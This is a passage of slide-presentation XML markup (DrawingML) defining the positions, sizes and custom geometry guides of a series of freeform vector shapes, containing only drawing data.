            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="849" y="3189"/>
                <a:ext cx="112" cy="83"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 335"/>
                  <a:gd name="T1" fmla="*/ 0 h 249"/>
                  <a:gd name="T2" fmla="*/ 0 w 335"/>
                  <a:gd name="T3" fmla="*/ 0 h 249"/>
                  <a:gd name="T4" fmla="*/ 0 w 335"/>
                  <a:gd name="T5" fmla="*/ 0 h 249"/>
                  <a:gd name="T6" fmla="*/ 0 w 335"/>
                  <a:gd name="T7" fmla="*/ 0 h 249"/>
                  <a:gd name="T8" fmla="*/ 0 w 335"/>
                  <a:gd name="T9" fmla="*/ 0 h 249"/>
                  <a:gd name="T10" fmla="*/ 0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9" name="Freeform 62"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1141" y="3196"/>
                <a:ext cx="128" cy="64"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 385"/>
                  <a:gd name="T1" fmla="*/ 0 h 191"/>
                  <a:gd name="T2" fmla="*/ 0 w 385"/>
                  <a:gd name="T3" fmla="*/ 0 h 191"/>
                  <a:gd name="T4" fmla="*/ 0 w 385"/>
                  <a:gd name="T5" fmla="*/ 0 h 191"/>
                  <a:gd name="T6" fmla="*/ 0 w 385"/>
                  <a:gd name="T7" fmla="*/ 0 h 191"/>
                  <a:gd name="T8" fmla="*/ 0 w 385"/>
                  <a:gd name="T9" fmla="*/ 0 h 191"/>
                  <a:gd name="T10" fmla="*/ 0 w 385"/>
                  <a:gd name="T11" fmla="*/ 0 h 191"/>
                  <a:gd name="T12" fmla="*/ 0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0" name="Freeform 63"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="854" y="3229"/>
                <a:ext cx="146" cy="78"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 438"/>
                  <a:gd name="T1" fmla="*/ 0 h 236"/>
                  <a:gd name="T2" fmla="*/ 0 w 438"/>
                  <a:gd name="T3" fmla="*/ 0 h 236"/>
                  <a:gd name="T4" fmla="*/ 0 w 438"/>
                  <a:gd name="T5" fmla="*/ 0 h 236"/>
                  <a:gd name="T6" fmla="*/ 0 w 438"/>
                  <a:gd name="T7" fmla="*/ 0 h 236"/>
                  <a:gd name="T8" fmla="*/ 0 w 438"/>
                  <a:gd name="T9" fmla="*/ 0 h 236"/>
                  <a:gd name="T10" fmla="*/ 0 w 438"/>
                  <a:gd name="T11" fmla="*/ 0 h 236"/>
                  <a:gd name="T12" fmla="*/ 0 w 438"/>
                  <a:gd name="T13" fmla="*/ 0 h 236"/>
                  <a:gd name="T14" fmla="*/ 0 w 438"/>
                  <a:gd name="T15" fmla="*/ 0 h 236"/>
                  <a:gd name="T16" fmla="*/ 0 w 438"/>
                  <a:gd name="T17" fmla="*/ 0 h 236"/>
                  <a:gd name="T18" fmla="*/ 0 w 438"/>
                  <a:gd name="T19" fmla="*/ 0 h 236"/>
                  <a:gd name="T20" fmla="*/ 0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1" name="Freeform 64"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="774" y="3032"/>
                <a:ext cx="619" cy="562"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1857"/>
                  <a:gd name="T1" fmla="*/ 0 h 1687"/>
                  <a:gd name="T2" fmla="*/ 0 w 1857"/>
                  <a:gd name="T3" fmla="*/ 0 h 1687"/>
                  <a:gd name="T4" fmla="*/ 0 w 1857"/>
                  <a:gd name="T5" fmla="*/ 0 h 1687"/>
                  <a:gd name="T6" fmla="*/ 0 w 1857"/>
                  <a:gd name="T7" fmla="*/ 0 h 1687"/>
                  <a:gd name="T8" fmla="*/ 0 w 1857"/>
                  <a:gd name="T9" fmla="*/ 0 h 1687"/>
                  <a:gd name="T10" fmla="*/ 0 w 1857"/>
                  <a:gd name="T11" fmla="*/ 0 h 1687"/>
                  <a:gd name="T12" fmla="*/ 0 w 1857"/>
                  <a:gd name="T13" fmla="*/ 0 h 1687"/>
                  <a:gd name="T14" fmla="*/ 0 w 1857"/>
                  <a:gd name="T15" fmla="*/ 0 h 1687"/>
                  <a:gd name="T16" fmla="*/ 0 w 1857"/>
                  <a:gd name="T17" fmla="*/ 0 h 1687"/>
                  <a:gd name="T18" fmla="*/ 0 w 1857"/>
                  <a:gd name="T19" fmla="*/ 0 h 1687"/>
                  <a:gd name="T20" fmla="*/ 0 w 1857"/>
                  <a:gd name="T21" fmla="*/ 0 h 1687"/>
                  <a:gd name="T22" fmla="*/ 0 w 1857"/>
                  <a:gd name="T23" fmla="*/ 0 h 1687"/>
                  <a:gd name="T24" fmla="*/ 0 w 1857"/>
                  <a:gd name="T25" fmla="*/ 0 h 1687"/>
                  <a:gd name="T26" fmla="*/ 0 w 1857"/>
                  <a:gd name="T27" fmla="*/ 0 h 1687"/>
                  <a:gd name="T28" fmla="*/ 0 w 1857"/>
                  <a:gd name="T29" fmla="*/ 0 h 1687"/>
                  <a:gd name="T30" fmla="*/ 0 w 1857"/>
                  <a:gd name="T31" fmla="*/ 0 h 1687"/>
                  <a:gd name="T32" fmla="*/ 0 w 1857"/>
                  <a:gd name="T33" fmla="*/ 0 h 1687"/>
                  <a:gd name="T34" fmla="*/ 0 w 1857"/>
                  <a:gd name="T35" fmla="*/ 0 h 1687"/>
                  <a:gd name="T36" fmla="*/ 0 w 1857"/>
                  <a:gd name="T37" fmla="*/ 0 h 1687"/>
                  <a:gd name="T38" fmla="*/ 0 w 1857"/>
                  <a:gd name="T39" fmla="*/ 0 h 1687"/>
                  <a:gd name="T40" fmla="*/ 0 w 1857"/>
                  <a:gd name="T41" fmla="*/ 0 h 1687"/>
                  <a:gd name="T42" fmla="*/ 0 w 1857"/>
                  <a:gd name="T43" fmla="*/ 0 h 1687"/>
                  <a:gd name="T44" fmla="*/ 0 w 1857"/>
                  <a:gd name="T45" fmla="*/ 0 h 1687"/>
                  <a:gd name="T46" fmla="*/ 0 w 1857"/>
                  <a:gd name="T47" fmla="*/ 0 h 1687"/>
                  <a:gd name="T48" fmla="*/ 0 w 1857"/>
                  <a:gd name="T49" fmla="*/ 0 h 1687"/>
                  <a:gd name="T50" fmla="*/ 0 w 1857"/>
                  <a:gd name="T51" fmla="*/ 0 h 1687"/>
                  <a:gd name="T52" fmla="*/ 0 w 1857"/>
                  <a:gd name="T53" fmla="*/ 0 h 1687"/>
                  <a:gd name="T54" fmla="*/ 0 w 1857"/>
                  <a:gd name="T55" fmla="*/ 0 h 1687"/>
                  <a:gd name="T56" fmla="*/ 0 w 1857"/>
                  <a:gd name="T57" fmla="*/ 0 h 1687"/>
                  <a:gd name="T58" fmla="*/ 0 w 1857"/>
                  <a:gd name="T59" fmla="*/ 0 h 1687"/>
                  <a:gd name="T60" fmla="*/ 0 w 1857"/>
                  <a:gd name="T61" fmla="*/ 0 h 1687"/>
                  <a:gd name="T62" fmla="*/ 0 w 1857"/>
                  <a:gd name="T63" fmla="*/ 0 h 1687"/>
                  <a:gd name="T64" fmla="*/ 0 w 1857"/>
                  <a:gd name="T65" fmla="*/ 0 h 1687"/>
                  <a:gd name="T66" fmla="*/ 0 w 1857"/>
                  <a:gd name="T67" fmla="*/ 0 h 1687"/>
                  <a:gd name="T68" fmla="*/ 0 w 1857"/>
                  <a:gd name="T69" fmla="*/ 0 h 1687"/>
                  <a:gd name="T70" fmla="*/ 0 w 1857"/>
                  <a:gd name="T71" fmla="*/ 0 h 1687"/>
                  <a:gd name="T72" fmla="*/ 0 w 1857"/>
                  <a:gd name="T73" fmla="*/ 0 h 1687"/>
                  <a:gd name="T74" fmla="*/ 0 w 1857"/>
                  <a:gd name="T75" fmla="*/ 0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2" name="Freeform 65"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="756" y="3002"/>
                <a:ext cx="591" cy="398"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1774"/>
                  <a:gd name="T1" fmla="*/ 0 h 1195"/>
                  <a:gd name="T2" fmla="*/ 0 w 1774"/>
                  <a:gd name="T3" fmla="*/ 0 h 1195"/>
                  <a:gd name="T4" fmla="*/ 0 w 1774"/>
                  <a:gd name="T5" fmla="*/ 0 h 1195"/>
                  <a:gd name="T6" fmla="*/ 0 w 1774"/>
                  <a:gd name="T7" fmla="*/ 0 h 1195"/>
                  <a:gd name="T8" fmla="*/ 0 w 1774"/>
                  <a:gd name="T9" fmla="*/ 0 h 1195"/>
                  <a:gd name="T10" fmla="*/ 0 w 1774"/>
                  <a:gd name="T11" fmla="*/ 0 h 1195"/>
                  <a:gd name="T12" fmla="*/ 0 w 1774"/>
                  <a:gd name="T13" fmla="*/ 0 h 1195"/>
                  <a:gd name="T14" fmla="*/ 0 w 1774"/>
                  <a:gd name="T15" fmla="*/ 0 h 1195"/>
                  <a:gd name="T16" fmla="*/ 0 w 1774"/>
                  <a:gd name="T17" fmla="*/ 0 h 1195"/>
                  <a:gd name="T18" fmla="*/ 0 w 1774"/>
                  <a:gd name="T19" fmla="*/ 0 h 1195"/>
                  <a:gd name="T20" fmla="*/ 0 w 1774"/>
                  <a:gd name="T21" fmla="*/ 0 h 1195"/>
                  <a:gd name="T22" fmla="*/ 0 w 1774"/>
                  <a:gd name="T23" fmla="*/ 0 h 1195"/>
                  <a:gd name="T24" fmla="*/ 0 w 1774"/>
                  <a:gd name="T25" fmla="*/ 0 h 1195"/>
                  <a:gd name="T26" fmla="*/ 0 w 1774"/>
                  <a:gd name="T27" fmla="*/ 0 h 1195"/>
                  <a:gd name="T28" fmla="*/ 0 w 1774"/>
                  <a:gd name="T29" fmla="*/ 0 h 1195"/>
                  <a:gd name="T30" fmla="*/ 0 w 1774"/>
                  <a:gd name="T31" fmla="*/ 0 h 1195"/>
                  <a:gd name="T32" fmla="*/ 0 w 1774"/>
                  <a:gd name="T33" fmla="*/ 0 h 1195"/>
                  <a:gd name="T34" fmla="*/ 0 w 1774"/>
                  <a:gd name="T35" fmla="*/ 0 h 1195"/>
                  <a:gd name="T36" fmla="*/ 0 w 1774"/>
                  <a:gd name="T37" fmla="*/ 0 h 1195"/>
                  <a:gd name="T38" fmla="*/ 0 w 1774"/>
                  <a:gd name="T39" fmla="*/ 0 h 1195"/>
                  <a:gd name="T40" fmla="*/ 0 w 1774"/>
                  <a:gd name="T41" fmla="*/ 0 h 1195"/>
                  <a:gd name="T42" fmla="*/ 0 w 1774"/>
                  <a:gd name="T43" fmla="*/ 0 h 1195"/>
                  <a:gd name="T44" fmla="*/ 0 w 1774"/>
                  <a:gd name="T45" fmla="*/ 0 h 1195"/>
                  <a:gd name="T46" fmla="*/ 0 w 1774"/>
                  <a:gd name="T47" fmla="*/ 0 h 1195"/>
                  <a:gd name="T48" fmla="*/ 0 w 1774"/>
                  <a:gd name="T49" fmla="*/ 0 h 1195"/>
                  <a:gd name="T50" fmla="*/ 0 w 1774"/>
                  <a:gd name="T51" fmla="*/ 0 h 1195"/>
                  <a:gd name="T52" fmla="*/ 0 w 1774"/>
                  <a:gd name="T53" fmla="*/ 0 h 1195"/>
                  <a:gd name="T54" fmla="*/ 0 w 1774"/>
                  <a:gd name="T55" fmla="*/ 0 h 1195"/>
                  <a:gd name="T56" fmla="*/ 0 w 1774"/>
                  <a:gd name="T57" fmla="*/ 0 h 1195"/>
                  <a:gd name="T58" fmla="*/ 0 w 1774"/>
                  <a:gd name="T59" fmla="*/ 0 h 1195"/>
                  <a:gd name="T60" fmla="*/ 0 w 1774"/>
                  <a:gd name="T61" fmla="*/ 0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3" name="Freeform 66"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="743" y="3033"/>
                <a:ext cx="123" cy="147"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 369"/>
                  <a:gd name="T1" fmla="*/ 0 h 441"/>
                  <a:gd name="T2" fmla="*/ 0 w 369"/>
                  <a:gd name="T3" fmla="*/ 0 h 441"/>
                  <a:gd name="T4" fmla="*/ 0 w 369"/>
                  <a:gd name="T5" fmla="*/ 0 h 441"/>
                  <a:gd name="T6" fmla="*/ 0 w 369"/>
                  <a:gd name="T7" fmla="*/ 0 h 441"/>
                  <a:gd name="T8" fmla="*/ 0 w 369"/>
                  <a:gd name="T9" fmla="*/ 0 h 441"/>
                  <a:gd name="T10" fmla="*/ 0 w 369"/>
                  <a:gd name="T11" fmla="*/ 0 h 441"/>
                  <a:gd name="T12" fmla="*/ 0 w 369"/>
                  <a:gd name="T13" fmla="*/ 0 h 441"/>
                  <a:gd name="T14" fmla="*/ 0 w 369"/>
                  <a:gd name="T15" fmla="*/ 0 h 441"/>
                  <a:gd name="T16" fmla="*/ 0 w 369"/>
                  <a:gd name="T17" fmla="*/ 0 h 441"/>
                  <a:gd name="T18" fmla="*/ 0 w 369"/>
                  <a:gd name="T19" fmla="*/ 0 h 441"/>
                  <a:gd name="T20" fmla="*/ 0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Freeform 67"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1026" y="3265"/>
                <a:ext cx="96" cy="48"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 289"/>
                  <a:gd name="T1" fmla="*/ 0 h 144"/>
                  <a:gd name="T2" fmla="*/ 0 w 289"/>
                  <a:gd name="T3" fmla="*/ 0 h 144"/>
                  <a:gd name="T4" fmla="*/ 0 w 289"/>
                  <a:gd name="T5" fmla="*/ 0 h 144"/>
                  <a:gd name="T6" fmla="*/ 0 w 289"/>
                  <a:gd name="T7" fmla="*/ 0 h 144"/>
                  <a:gd name="T8" fmla="*/ 0 w 289"/>
                  <a:gd name="T9" fmla="*/ 0 h 144"/>
                  <a:gd name="T10" fmla="*/ 0 w 289"/>
                  <a:gd name="T11" fmla="*/ 0 h 144"/>
                  <a:gd name="T12" fmla="*/ 0 w 289"/>
                  <a:gd name="T13" fmla="*/ 0 h 144"/>
                  <a:gd name="T14" fmla="*/ 0 w 289"/>
                  <a:gd name="T15" fmla="*/ 0 h 144"/>
                  <a:gd name="T16" fmla="*/ 0 w 289"/>
                  <a:gd name="T17" fmla="*/ 0 h 144"/>
                  <a:gd name="T18" fmla="*/ 0 w 289"/>
                  <a:gd name="T19" fmla="*/ 0 h 144"/>
                  <a:gd name="T20" fmla="*/ 0 w 289"/>
                  <a:gd name="T21" fmla="*/ 0 h 144"/>
                  <a:gd name="T22" fmla="*/ 0 w 289"/>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5" name="Freeform 68"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="482" y="3713"/>
                <a:ext cx="1149" cy="245"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3447"/>
                  <a:gd name="T1" fmla="*/ 0 h 735"/>
                  <a:gd name="T2" fmla="*/ 0 w 3447"/>
                  <a:gd name="T3" fmla="*/ 0 h 735"/>
                  <a:gd name="T4" fmla="*/ 0 w 3447"/>
                  <a:gd name="T5" fmla="*/ 0 h 735"/>
                  <a:gd name="T6" fmla="*/ 0 w 3447"/>
                  <a:gd name="T7" fmla="*/ 0 h 735"/>
                  <a:gd name="T8" fmla="*/ 0 w 3447"/>
                  <a:gd name="T9" fmla="*/ 0 h 735"/>
                  <a:gd name="T10" fmla="*/ 0 w 3447"/>
                  <a:gd name="T11" fmla="*/ 0 h 735"/>
                  <a:gd name="T12" fmla="*/ 0 w 3447"/>
                  <a:gd name="T13" fmla="*/ 0 h 735"/>
                  <a:gd name="T14" fmla="*/ 0 w 3447"/>
                  <a:gd name="T15" fmla="*/ 0 h 735"/>
                  <a:gd name="T16" fmla="*/ 0 w 3447"/>
                  <a:gd name="T17" fmla="*/ 0 h 735"/>
                  <a:gd name="T18" fmla="*/ 0 w 3447"/>
                  <a:gd name="T19" fmla="*/ 0 h 735"/>
                  <a:gd name="T20" fmla="*/ 0 w 3447"/>
                  <a:gd name="T21" fmla="*/ 0 h 735"/>
                  <a:gd name="T22" fmla="*/ 1 w 3447"/>
                  <a:gd name="T23" fmla="*/ 0 h 735"/>
                  <a:gd name="T24" fmla="*/ 1 w 3447"/>
                  <a:gd name="T25" fmla="*/ 0 h 735"/>
                  <a:gd name="T26" fmla="*/ 1 w 3447"/>
                  <a:gd name="T27" fmla="*/ 0 h 735"/>
                  <a:gd name="T28" fmla="*/ 0 w 3447"/>
                  <a:gd name="T29" fmla="*/ 0 h 735"/>
                  <a:gd name="T30" fmla="*/ 0 w 3447"/>
                  <a:gd name="T31" fmla="*/ 0 h 735"/>
                  <a:gd name="T32" fmla="*/ 0 w 3447"/>
                  <a:gd name="T33" fmla="*/ 0 h 735"/>
                  <a:gd name="T34" fmla="*/ 0 w 3447"/>
                  <a:gd name="T35" fmla="*/ 0 h 735"/>
                  <a:gd name="T36" fmla="*/ 0 w 3447"/>
                  <a:gd name="T37" fmla="*/ 0 h 735"/>
                  <a:gd name="T38" fmla="*/ 0 w 3447"/>
                  <a:gd name="T39" fmla="*/ 0 h 735"/>
                  <a:gd name="T40" fmla="*/ 0 w 3447"/>
                  <a:gd name="T41" fmla="*/ 0 h 735"/>
                  <a:gd name="T42" fmla="*/ 0 w 3447"/>
                  <a:gd name="T43" fmla="*/ 0 h 735"/>
                  <a:gd name="T44" fmla="*/ 0 w 3447"/>
                  <a:gd name="T45" fmla="*/ 0 h 735"/>
                  <a:gd name="T46" fmla="*/ 0 w 3447"/>
                  <a:gd name="T47" fmla="*/ 0 h 735"/>
                  <a:gd name="T48" fmla="*/ 0 w 3447"/>
                  <a:gd name="T49" fmla="*/ 0 h 735"/>
                  <a:gd name="T50" fmla="*/ 0 w 3447"/>
                  <a:gd name="T51" fmla="*/ 0 h 735"/>
                  <a:gd name="T52" fmla="*/ 0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6" name="Freeform 69"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="645" y="2936"/>
                <a:ext cx="857" cy="599"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2571"/>
                  <a:gd name="T1" fmla="*/ 0 h 1796"/>
                  <a:gd name="T2" fmla="*/ 0 w 2571"/>
                  <a:gd name="T3" fmla="*/ 0 h 1796"/>
                  <a:gd name="T4" fmla="*/ 0 w 2571"/>
                  <a:gd name="T5" fmla="*/ 0 h 1796"/>
                  <a:gd name="T6" fmla="*/ 0 w 2571"/>
                  <a:gd name="T7" fmla="*/ 0 h 1796"/>
                  <a:gd name="T8" fmla="*/ 0 w 2571"/>
                  <a:gd name="T9" fmla="*/ 0 h 1796"/>
                  <a:gd name="T10" fmla="*/ 0 w 2571"/>
                  <a:gd name="T11" fmla="*/ 0 h 1796"/>
                  <a:gd name="T12" fmla="*/ 0 w 2571"/>
                  <a:gd name="T13" fmla="*/ 0 h 1796"/>
                  <a:gd name="T14" fmla="*/ 0 w 2571"/>
                  <a:gd name="T15" fmla="*/ 0 h 1796"/>
                  <a:gd name="T16" fmla="*/ 0 w 2571"/>
                  <a:gd name="T17" fmla="*/ 0 h 1796"/>
                  <a:gd name="T18" fmla="*/ 0 w 2571"/>
                  <a:gd name="T19" fmla="*/ 0 h 1796"/>
                  <a:gd name="T20" fmla="*/ 0 w 2571"/>
                  <a:gd name="T21" fmla="*/ 0 h 1796"/>
                  <a:gd name="T22" fmla="*/ 0 w 2571"/>
                  <a:gd name="T23" fmla="*/ 0 h 1796"/>
                  <a:gd name="T24" fmla="*/ 0 w 2571"/>
                  <a:gd name="T25" fmla="*/ 0 h 1796"/>
                  <a:gd name="T26" fmla="*/ 0 w 2571"/>
                  <a:gd name="T27" fmla="*/ 0 h 1796"/>
                  <a:gd name="T28" fmla="*/ 0 w 2571"/>
                  <a:gd name="T29" fmla="*/ 0 h 1796"/>
                  <a:gd name="T30" fmla="*/ 0 w 2571"/>
                  <a:gd name="T31" fmla="*/ 0 h 1796"/>
                  <a:gd name="T32" fmla="*/ 0 w 2571"/>
                  <a:gd name="T33" fmla="*/ 0 h 1796"/>
                  <a:gd name="T34" fmla="*/ 0 w 2571"/>
                  <a:gd name="T35" fmla="*/ 0 h 1796"/>
                  <a:gd name="T36" fmla="*/ 0 w 2571"/>
                  <a:gd name="T37" fmla="*/ 0 h 1796"/>
                  <a:gd name="T38" fmla="*/ 0 w 2571"/>
                  <a:gd name="T39" fmla="*/ 0 h 1796"/>
                  <a:gd name="T40" fmla="*/ 0 w 2571"/>
                  <a:gd name="T41" fmla="*/ 0 h 1796"/>
                  <a:gd name="T42" fmla="*/ 0 w 2571"/>
                  <a:gd name="T43" fmla="*/ 0 h 1796"/>
                  <a:gd name="T44" fmla="*/ 0 w 2571"/>
                  <a:gd name="T45" fmla="*/ 0 h 1796"/>
                  <a:gd name="T46" fmla="*/ 0 w 2571"/>
                  <a:gd name="T47" fmla="*/ 0 h 1796"/>
                  <a:gd name="T48" fmla="*/ 0 w 2571"/>
                  <a:gd name="T49" fmla="*/ 0 h 1796"/>
                  <a:gd name="T50" fmla="*/ 0 w 2571"/>
                  <a:gd name="T51" fmla="*/ 0 h 1796"/>
                  <a:gd name="T52" fmla="*/ 0 w 2571"/>
                  <a:gd name="T53" fmla="*/ 0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7" name="Freeform 70"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="710" y="3348"/>
                <a:ext cx="800" cy="375"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2400"/>
                  <a:gd name="T1" fmla="*/ 0 h 1125"/>
                  <a:gd name="T2" fmla="*/ 0 w 2400"/>
                  <a:gd name="T3" fmla="*/ 0 h 1125"/>
                  <a:gd name="T4" fmla="*/ 0 w 2400"/>
                  <a:gd name="T5" fmla="*/ 0 h 1125"/>
                  <a:gd name="T6" fmla="*/ 0 w 2400"/>
                  <a:gd name="T7" fmla="*/ 0 h 1125"/>
                  <a:gd name="T8" fmla="*/ 0 w 2400"/>
                  <a:gd name="T9" fmla="*/ 0 h 1125"/>
                  <a:gd name="T10" fmla="*/ 0 w 2400"/>
                  <a:gd name="T11" fmla="*/ 0 h 1125"/>
                  <a:gd name="T12" fmla="*/ 0 w 2400"/>
                  <a:gd name="T13" fmla="*/ 0 h 1125"/>
                  <a:gd name="T14" fmla="*/ 0 w 2400"/>
                  <a:gd name="T15" fmla="*/ 0 h 1125"/>
                  <a:gd name="T16" fmla="*/ 0 w 2400"/>
                  <a:gd name="T17" fmla="*/ 0 h 1125"/>
                  <a:gd name="T18" fmla="*/ 0 w 2400"/>
                  <a:gd name="T19" fmla="*/ 0 h 1125"/>
                  <a:gd name="T20" fmla="*/ 0 w 2400"/>
                  <a:gd name="T21" fmla="*/ 0 h 1125"/>
                  <a:gd name="T22" fmla="*/ 0 w 2400"/>
                  <a:gd name="T23" fmla="*/ 0 h 1125"/>
                  <a:gd name="T24" fmla="*/ 0 w 2400"/>
                  <a:gd name="T25" fmla="*/ 0 h 1125"/>
                  <a:gd name="T26" fmla="*/ 0 w 2400"/>
                  <a:gd name="T27" fmla="*/ 0 h 1125"/>
                  <a:gd name="T28" fmla="*/ 0 w 2400"/>
                  <a:gd name="T29" fmla="*/ 0 h 1125"/>
                  <a:gd name="T30" fmla="*/ 0 w 2400"/>
                  <a:gd name="T31" fmla="*/ 0 h 1125"/>
                  <a:gd name="T32" fmla="*/ 0 w 2400"/>
                  <a:gd name="T33" fmla="*/ 0 h 1125"/>
                  <a:gd name="T34" fmla="*/ 0 w 2400"/>
                  <a:gd name="T35" fmla="*/ 0 h 1125"/>
                  <a:gd name="T36" fmla="*/ 0 w 2400"/>
                  <a:gd name="T37" fmla="*/ 0 h 1125"/>
                  <a:gd name="T38" fmla="*/ 0 w 2400"/>
                  <a:gd name="T39" fmla="*/ 0 h 1125"/>
                  <a:gd name="T40" fmla="*/ 0 w 2400"/>
                  <a:gd name="T41" fmla="*/ 0 h 1125"/>
                  <a:gd name="T42" fmla="*/ 0 w 2400"/>
                  <a:gd name="T43" fmla="*/ 0 h 1125"/>
                  <a:gd name="T44" fmla="*/ 0 w 2400"/>
                  <a:gd name="T45" fmla="*/ 0 h 1125"/>
                  <a:gd name="T46" fmla="*/ 0 w 2400"/>
                  <a:gd name="T47" fmla="*/ 0 h 1125"/>
                  <a:gd name="T48" fmla="*/ 0 w 2400"/>
                  <a:gd name="T49" fmla="*/ 0 h 1125"/>
                  <a:gd name="T50" fmla="*/ 0 w 2400"/>
                  <a:gd name="T51" fmla="*/ 0 h 1125"/>
                  <a:gd name="T52" fmla="*/ 0 w 2400"/>
                  <a:gd name="T53" fmla="*/ 0 h 1125"/>
                  <a:gd name="T54" fmla="*/ 0 w 2400"/>
                  <a:gd name="T55" fmla="*/ 0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8" name="Freeform 71"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="787" y="3660"/>
                <a:ext cx="132" cy="77"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 396"/>
                  <a:gd name="T1" fmla="*/ 0 h 232"/>
                  <a:gd name="T2" fmla="*/ 0 w 396"/>
                  <a:gd name="T3" fmla="*/ 0 h 232"/>
                  <a:gd name="T4" fmla="*/ 0 w 396"/>
                  <a:gd name="T5" fmla="*/ 0 h 232"/>
                  <a:gd name="T6" fmla="*/ 0 w 396"/>
                  <a:gd name="T7" fmla="*/ 0 h 232"/>
                  <a:gd name="T8" fmla="*/ 0 w 396"/>
                  <a:gd name="T9" fmla="*/ 0 h 232"/>
                  <a:gd name="T10" fmla="*/ 0 w 396"/>
                  <a:gd name="T11" fmla="*/ 0 h 232"/>
                  <a:gd name="T12" fmla="*/ 0 w 396"/>
                  <a:gd name="T13" fmla="*/ 0 h 232"/>
                  <a:gd name="T14" fmla="*/ 0 w 396"/>
                  <a:gd name="T15" fmla="*/ 0 h 232"/>
                  <a:gd name="T16" fmla="*/ 0 w 396"/>
                  <a:gd name="T17" fmla="*/ 0 h 232"/>
                  <a:gd name="T18" fmla="*/ 0 w 396"/>
                  <a:gd name="T19" fmla="*/ 0 h 232"/>
                  <a:gd name="T20" fmla="*/ 0 w 396"/>
                  <a:gd name="T21" fmla="*/ 0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9" name="Freeform 72"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="928" y="3687"/>
                <a:ext cx="476" cy="67"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1427"/>
                  <a:gd name="T1" fmla="*/ 0 h 201"/>
                  <a:gd name="T2" fmla="*/ 0 w 1427"/>
                  <a:gd name="T3" fmla="*/ 0 h 201"/>
                  <a:gd name="T4" fmla="*/ 0 w 1427"/>
                  <a:gd name="T5" fmla="*/ 0 h 201"/>
                  <a:gd name="T6" fmla="*/ 0 w 1427"/>
                  <a:gd name="T7" fmla="*/ 0 h 201"/>
                  <a:gd name="T8" fmla="*/ 0 w 1427"/>
                  <a:gd name="T9" fmla="*/ 0 h 201"/>
                  <a:gd name="T10" fmla="*/ 0 w 1427"/>
                  <a:gd name="T11" fmla="*/ 0 h 201"/>
                  <a:gd name="T12" fmla="*/ 0 w 1427"/>
                  <a:gd name="T13" fmla="*/ 0 h 201"/>
                  <a:gd name="T14" fmla="*/ 0 w 1427"/>
                  <a:gd name="T15" fmla="*/ 0 h 201"/>
                  <a:gd name="T16" fmla="*/ 0 w 1427"/>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0" name="Freeform 73"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="623" y="3814"/>
                <a:ext cx="567" cy="65"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1701"/>
                  <a:gd name="T1" fmla="*/ 0 h 194"/>
                  <a:gd name="T2" fmla="*/ 0 w 1701"/>
                  <a:gd name="T3" fmla="*/ 0 h 194"/>
